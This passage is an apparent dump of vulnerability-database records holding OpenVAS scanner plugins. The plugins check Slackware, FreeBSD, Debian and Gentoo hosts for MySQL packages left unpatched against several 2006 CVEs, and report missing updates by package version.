E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.19-i486-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-26T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:56850", "href": "http://plugins.openvas.org/nasl.php?oid=56850", "type": "openvas", "title": "FreeBSD Ports: mysql-server", "sourceData": "#\n#VID 4913886c-e875-11da-b9f4-00123ffe8333\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: mysql-server\n\nCVE-2006-1516\nThe check_connection function in sql_parse.cc in MySQL 4.0.x up to\n4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote\nattackers to read portions of memory via a username without a trailing\nnull byte, which causes a buffer over-read.\n\nCVE-2006-1517\nsql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and\n5.0.x up to 5.0.20 allows remote attackers to obtain sensitive\ninformation via a COM_TABLE_DUMP request with an incorrect packet\nlength, which includes portions of memory in an error message.\n\nCVE-2006-1518\nBuffer overflow in the open_table function in sql_base.cc in MySQL\n5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary\ncode via crafted COM_TABLE_DUMP packets with invalid length values.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.wisec.it/vulns.php?page=7\nhttp://www.wisec.it/vulns.php?page=8\nhttp://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\nhttp://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nhttp://secunia.com/advisories/19929/\nhttp://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html\nhttp://www.vuxml.org/freebsd/4913886c-e875-11da-b9f4-00123ffe8333.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56850);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: mysql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mysql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.0\")>0 && revcomp(a:bver, b:\"4.0.27\")<0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"4.1\")>0 && revcomp(a:bver, b:\"4.1.19\")<0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"5.1\")>0 && revcomp(a:bver, b:\"5.1.9\")<=0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231056730", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231056730", "type": "openvas", "title": "Slackware Advisory SSA:2006-129-02 mysql", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_129_02.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.56730\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-129-02 mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK10\\.2\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-129-02\");\n\n script_tag(name:\"insight\", value:\"New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. The MySQL package previously in\nSlackware -current also suffered from these flaws, but an additional\noverflow could allow arbitrary code execution.\n\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.19-i486-1\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to mysql\nannounced via advisory DSA 1071-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56788", "href": "http://plugins.openvas.org/nasl.php?oid=56788", "type": "openvas", "title": "Debian Security Advisory DSA 1071-1 (mysql)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1071_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1071-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\nImproper handling of SQL queries containing the NULL character\nallow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\nUsernames without a trailing null byte allow remote attackers to\nread portions of memory.\n\nCVE-2006-1517\n\nA request with an incorrect packet length allows remote attackers\nto obtain sensitive information.\n\nCVE-2006-1518\n\nSpecially crafted request packets with invalid length values allow\nthe execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\nwoody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\";\ntag_summary = \"The remote host is missing an update to mysql\nannounced via advisory DSA 1071-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201071-1\";\n\nif(description)\n{\n script_id(56788);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850,17780);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1071-1 (mysql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-doc\", ver:\"3.23.49-8.5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient10\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient10-dev\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to mysql-dfsg-4.1\nannounced via advisory DSA 1073-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56789", "href": "http://plugins.openvas.org/nasl.php?oid=56789", "type": "openvas", "title": "Debian Security Advisory DSA 1073-1 (mysql-dfsg-4.1)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1073_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1073-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\nImproper handling of SQL queries containing the NULL character\nallow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\nUsernames without a trailing null byte allow remote attackers to\nread portions of memory.\n\nCVE-2006-1517\n\nA request with an incorrect packet length allows remote attackers\nto obtain sensitive information.\n\nCVE-2006-1518\n\nSpecially crafted request packets with invalid length values allow\nthe execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\nwoody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\";\ntag_summary = \"The remote host is missing an update to mysql-dfsg-4.1\nannounced via advisory DSA 1073-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201073-1\";\n\nif(description)\n{\n script_id(56789);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850,17780);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1073-1 (mysql-dfsg-4.1)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mysql-common-4.1\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient14\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient14-dev\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-4.1\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-4.1\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to mysql-dfsg\nannounced via advisory DSA 1079-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56833", "href": "http://plugins.openvas.org/nasl.php?oid=56833", "type": "openvas", "title": "Debian Security Advisory DSA 1079-1 (mysql-dfsg)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1079_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1079-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\nImproper handling of SQL queries containing the NULL character\nallow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\nUsernames without a trailing null byte allow remote attackers to\nread portions of memory.\n\nCVE-2006-1517\n\nA request with an incorrect packet length allows remote attackers\nto obtain sensitive information.\n\nCVE-2006-1518\n\nSpecially crafted request packets with invalid length values allow\nthe execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\nwoody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\";\ntag_summary = \"The remote host is missing an update to mysql-dfsg\nannounced via advisory DSA 1079-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201079-1\";\n\nif(description)\n{\n script_id(56833);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850,17780);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1079-1 (mysql-dfsg)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient12\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient12-dev\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1516"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200605-13.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:56728", "href": "http://plugins.openvas.org/nasl.php?oid=56728", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200605-13 (MySQL)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A MySQL server may leak information to unauthorized users.\";\ntag_solution = \"All MySQL users should upgrade to the latest version.\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/mysql-4.0.27'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200605-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=132146\nhttp://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-05/msg00041.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200605-13.\";\n\n \n\nif(description)\n{\n script_id(56728);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200605-13 (MySQL)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-db/mysql\", unaffected: make_list(\"ge 4.1.19\", \"rge 4.0.27\"), vulnerable: make_list(\"lt 4.1.19\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-2753", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231056861", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231056861", "type": "openvas", "title": "Slackware Advisory SSA:2006-155-01 mysql", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_155_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 